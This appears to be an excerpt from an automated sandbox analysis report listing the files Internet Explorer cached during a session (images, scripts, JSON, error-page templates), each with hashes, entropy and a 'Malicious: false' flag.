                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):242382
                                        Entropy (8bit):5.1486574437549235
                                        Encrypted:false
                                        SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                        MD5:D76FFE379391B1C7EE0773A842843B7E
                                        SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                        SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                        SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\location[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):182
                                        Entropy (8bit):4.685293041881485
                                        Encrypted:false
                                        SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                        MD5:C4F67A4EFC37372559CD375AA74454A3
                                        SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                        SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                        SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otBannerSdk[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):374818
                                        Entropy (8bit):5.338137698375348
                                        Encrypted:false
                                        SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                        MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                        SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                        SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                        SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otTCF-ie[2].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):102879
                                        Entropy (8bit):5.311489377663803
                                        Encrypted:false
                                        SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                        MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                        SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                        SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                        SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AANf6qa[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):432
                                        Entropy (8bit):7.252548911424453
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                        MD5:7ED73D785784B44CF3BD897AB475E5CF
                                        SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                        SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                        SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOfJsZ[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):2490
                                        Entropy (8bit):7.830846007357338
                                        Encrypted:false
                                        SSDEEP:48:QfAuETASNLIt+OSmfUyYuQ8tUnAGtl2hZZL1zG4tTCJ:Qf7EpIyyUyfntUnAOlW1zGIy
                                        MD5:6FA342BB2DAD0272A38CCF9D8B599264
                                        SHA1:65FEE20BEB7A5735412D9759B2E5FA1CAECA27A1
                                        SHA-256:74C1C1A5A96916E147002ECA860D303A57942161D3D7F9F2AAAA6A1CF4EB30E2
                                        SHA-512:2CA505CD6D2B18A510785187B69BED0F3A7050EC15D157AEF187901E1FE149AFFD8A6CF67C1BA628A323CA4252F4D723A4E29D3D5C5BBDF8C06816A78477C39B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOfsCY[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):30752
                                        Entropy (8bit):7.906234754194529
                                        Encrypted:false
                                        SSDEEP:768:ITUs9uf7dj9BrZJEhs9zMVbj7xUp+6rqaxiatR8MiCqeB:Izuf7fhPE2zMVbh2rqaJnLiCLB
                                        MD5:AD584D72D7932711DB1D30832190E067
                                        SHA1:290EC377BC938991D3BDA888D74666EAD6CBB18A
                                        SHA-256:848B429A0185010DD921D927A29D5DFE2ED332D379E008CE465FA6508EB35948
                                        SHA-512:DB034AB85381270E3AFFBAD3B15FB94A9C1E894F2E1A84B13A0FB4D6D66FFDE158B70377068668BD721CA500D6AAB3788CEE6C830A7AFC8C48044A01E6AC2DEC
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgGQ4[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):26435
                                        Entropy (8bit):7.859283933483462
                                        Encrypted:false
                                        SSDEEP:384:IfBCgXWkx0RXMuUEMClBLZq2D3tkInTQu7N6m0eqLi4ivk6guSSi/JR8ypJ/sbrp:IRXsyEMMZq27PQu0myLif86E3/JRFgp
                                        MD5:BEB948AAC940AF84538BE16878295A12
                                        SHA1:45E817191F2714065A688665051C407182E4066B
                                        SHA-256:58F3F86421160FE5176BB87B8F61B2913FD8F424EEDF71276CE6A8D81CC706C1
                                        SHA-512:4FF5E0F33C3744AC4AAEC39CBE1845F4053EE7ADCAF439CB6C16D38641A24E9212EDA4601FA7FFCB600C1AEFBC2E937DED78108A2DFAB0CD403C4E26B6F06647
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgIQG[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):4394
                                        Entropy (8bit):7.030110019355473
                                        Encrypted:false
                                        SSDEEP:48:Qf5uETAGK88888Z1sHvq2WNK0NVuwmS9CapNiWWWWd:QfQE9GHz0/mSTpNiWWWWd
                                        MD5:16BDA1AE195B38579F194CD823D801F8
                                        SHA1:A216736D1818913D2856B46D4FFB45661105AC34
                                        SHA-256:5923487B64BB2CE31EE68CAC5C68C4FF3992EC21AC7135CA9C84293E3FD711BC
                                        SHA-512:6C95E99091B76DE8994405AB13BE73427534B83A858FA6B9929419858935B30BBC1686BB60094FA82585646B07497FF83F5777F13CBC5F3D0B0E7DE68382415E
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgQuh[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):20560
                                        Entropy (8bit):7.937929871385382
                                        Encrypted:false
                                        SSDEEP:384:NRsH8HzZZclei6WeMXHl7Sp+fAtdzY8M8D2VCjFjCudbXbVzbO:N0u7cqMXZLi55jo
                                        MD5:A01C83C62C30D97DF34FEFBB82A71BC0
                                        SHA1:A41A9927BFE2EEE48929AF2CC733F1C08F21F4FD
                                        SHA-256:A177ADFF17E51F55AAB7D919C77705142CA703B2E15CE2396597DE6F21D12F5B
                                        SHA-512:545FBA728BFDD27CFB811B42150CC0AE7BA644A2407B460CA697A904AAED58E9E9D7D976FA65B1E96D947D22A304BC60EB7AF7B3E1A8BAA82F09D6A3F283230E
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgh94[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):24289
                                        Entropy (8bit):7.8927009680659035
                                        Encrypted:false
                                        SSDEEP:384:IpRJkRtiLu2XyZ/QZSplX9F5Y+qa78OfyyT3Yn3SHUvyHaUVhOyKAouCbUqFyBIx:IvKRUK2Xyygph9F55qaLDrY35jUVm34w
                                        MD5:E7E05927E7E3C1833D7F9E3B8BF0667C
                                        SHA1:91FD68F02453FEB6FBF7BE324C9EF22051900635
                                        SHA-256:0861EFDDBA661DF1C1B78A61AD7CBFD4FAD6FDF4B97CC05C8D7859C685EEE680
                                        SHA-512:E8CA13376FDCAFC7289E51B3F500681DABF06489099310C84E2107C7700EFE1D34E9CCB0768833EBD866CC48CA252F7152363721524F7280C4478803348E7484
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgkHA[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):8589
                                        Entropy (8bit):7.917883695837637
                                        Encrypted:false
                                        SSDEEP:192:Qo6znNwgr1T/regmhcvAa31b1TMu2UQa9uQEEa1Wkfq1:b6znNvRzycvj1TMurxET1bfq1
                                        MD5:464362B49496E353AABF75DA5015B426
                                        SHA1:51C5A1291B3B5746BB5602CD19F68ABA7FFCC838
                                        SHA-256:3F86873DB8AF0970856EE5493C1712D11444B75DA21B3F90E27495BA0AA4B943
                                        SHA-512:D51C63F9D6296FF7035B1D5AFA7973E22250B5A36CB56834F09045ABF87950B4F5F94763578D833B27626AA3981CE0C679C6730AE10CC248CD723E8F5645E2C1
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgmIX[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                        Category:dropped
                                        Size (bytes):12089
                                        Entropy (8bit):7.904789531773816
                                        Encrypted:false
                                        SSDEEP:192:QtIaSD1Y9EN+brlhrr8hJ+sDbecdnERkmMtGLhsDmZrgnbLGKnVDXZJ/29qtJXmq:+IaSD1XEbYn+sDbecy/MtGLhrdWdX/2A
                                        MD5:545034BC80A1AACF34CC4EDC5C66F0F4
                                        SHA1:AB11903457FF4F7CCF18CD685EF33CD037BF1965
                                        SHA-256:AE3C9594D1A49BB4B2F04659BF6131D989BE980275C1E12DF7683A2FE804E4B9
                                        SHA-512:EBA05B272F6FF630B31551EC7508B470F18B1817B30988D74B1A80FB4C5BA220E153CBED4E9BE5FC6638B26178E80934F1A2872F69898FB33B916D86CB54E8FA
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgssn[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):1795
                                        Entropy (8bit):7.7052505934793505
                                        Encrypted:false
                                        SSDEEP:48:QfAuETAKN9RqSHHdGyoWoShvSm7czvspOcRAilZMtJ6o+:Qf7EBN9Rq3O7cgRllZc6z
                                        MD5:955778C44C886F710B68343BFD22399D
                                        SHA1:5029F27A4CB7E72AA88443535A4EEB062444698F
                                        SHA-256:4400EE9063E5D9C7B74193207380EFF45087A5859C07B3C85D0BA0C31F16CFBA
                                        SHA-512:FBB8B427C49408CBB2B44E073656398AC5C2BF55F8DAD44000EBA12F4E2C24B6EBE1258F1D870F071A3F0BAEF3F846CC6DB40A74665D86DE0B3B2637E1BC0308
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgtUM[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):9977
                                        Entropy (8bit):7.946009698326732
                                        Encrypted:false
                                        SSDEEP:192:QoT3vwOvtbiYeKdklm6R3rK0Ht9xS3S4wNvFkBvPopCO/Jv:bToO9dko6rJHDxw+vF6O1
                                        MD5:52FD0C986FE86FA1B95FC4CAF4F18A64
                                        SHA1:BA32E32160A537405CF661194D78BF627AD57295
                                        SHA-256:048CA77D1369A0EC826C5D8F108E052E818A99BD847DAD375DB04D330EA20115
                                        SHA-512:C3AD8FABA1A7292A460582FC2CFA06BDFA0D9949AE43E7CFB5CD7CB93AE422C18230BE86044664D4B0308833761D1C79C9D8EBC77E1E39CADDA3742A676A6085
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgzB2[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):2573
                                        Entropy (8bit):7.808660714708082
                                        Encrypted:false
                                        SSDEEP:48:QfAuETAvMK8GJOxgUXMdjA2XZH+XN4zPdn82nVrnF4J:Qf7ETKlUfcdzpeXOzVnFnVruJ
                                        MD5:C32C7CC30144AC309E0FD9922D4611CA
                                        SHA1:441EFE87996A8CD7CB25D39054DDE0E3ED3AAEA5
                                        SHA-256:0242664F6C06D24F965A06EEFDCA3768D1F607B55B50D4FAEAF242244AD81540
                                        SHA-512:52A610FD596D00E94D21E4FD1A7D7D1708DC09BAC6C68C302367589DCC08FC9E65ECA2E396BFAE1AF2F9826057CF089C5A1778E4FD25DDF07C62DB52AD955A75
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB14EN7h[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):13764
                                        Entropy (8bit):7.273450351118404
                                        Encrypted:false
                                        SSDEEP:384:IfOm4cIa37nstlEM15mv7OAkrIh4McOD07+8n0GoJdxFhEh8:I2m4pa37stlTgqAjS0GoJd3yK
                                        MD5:DA6531188AED539AF6EAA0F89912AACF
                                        SHA1:602244816EA22CBE39BBD4DB386519908745D45C
                                        SHA-256:C719BE5FFC45680FE2A18CDB129E60A48A27A6666231636378918B4344F149F7
                                        SHA-512:DF03FA1CB6ED0D1FFAC5FB5F2BB6523D373AC4A67CEE1AAF07E0DA61E3F19E7AF43673B6BEFE7192648AC2531EF64F6B4F93F941BF014ED2791FA6F46720C7DB
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1aXBV1[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):1161
                                        Entropy (8bit):7.80841974432226
                                        Encrypted:false
                                        SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                        MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                        SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                        SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                        SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB6Ma4a[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):368
                                        Entropy (8bit):6.811857078347448
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                        MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                        SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                        SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                        SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB7gRE[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):501
                                        Entropy (8bit):7.3374462687222906
                                        Encrypted:false
                                        SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                        MD5:1FCA95AEED29D3219D0A53A78A041312
                                        SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                        SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                        SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBlBV0U[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):542
                                        Entropy (8bit):7.476988192789716
                                        Encrypted:false
                                        SSDEEP:12:6v/7/uYnJg/tVJWJ7i7lwFdKad7mGmPbyAjKMOPdgI6t7:Wu26M0l5aMcAjdOlgI6t7
                                        MD5:8B760EC6573A9B19F6DB79E85C2C02C1
                                        SHA1:F76EDAAC77576BC4B03C3F2C80A1F97FA96EA820
                                        SHA-256:9A2405F53A961F5CC9160554578BE42A2E7053864DE3EC91874E8EA89D2A796C
                                        SHA-512:AC35B329BBB706581C3BF915B3843FCF06D1A758ACC5E41A5EF1D1E60A0080E0E96959339FF40163F5CD34EF97DFB100A33F7A4F6E43149BDE254D1FDAC6F59B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a5ea21[2].ico
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):758
                                        Entropy (8bit):7.432323547387593
                                        Encrypted:false
                                        SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                        MD5:84CC977D0EB148166481B01D8418E375
                                        SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                        SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                        SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 28 x 28
                                        Category:dropped
                                        Size (bytes):16360
                                        Entropy (8bit):7.019403238999426
                                        Encrypted:false
                                        SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                        MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                        SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                        SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                        SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\auction[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4617
                                        Entropy (8bit):5.963868756868799
                                        Encrypted:false
                                        SSDEEP:96:8zM7k7gM7kzMwom1bT5MGZTrmCA3FPdlJTIpDD7uPc39gnmaxgui:PsjwnT5o3ZdlJTItesgZgj
                                        MD5:10BA7EDAA109C1D8A965963D3439FEB3
                                        SHA1:F9B3D9517269A8E1ECAE7B2C4A9EFB6619710991
                                        SHA-256:F8EF977ED66ED6CB2226F2B2376D0FA854D0DB6493E8B55A4E10225E500BAB2C
                                        SHA-512:E69DA1E79F65C2E7AB9E4914C2BD4D4CBFDAC7FAFC0916A2153B4D1B14AB3FC0BD440FBE40D31506DB460A99F33CF927B2930D43DB2B1EAF1BE1470EE8F85642
                                        Malicious:false
                                        Reputation:unknown
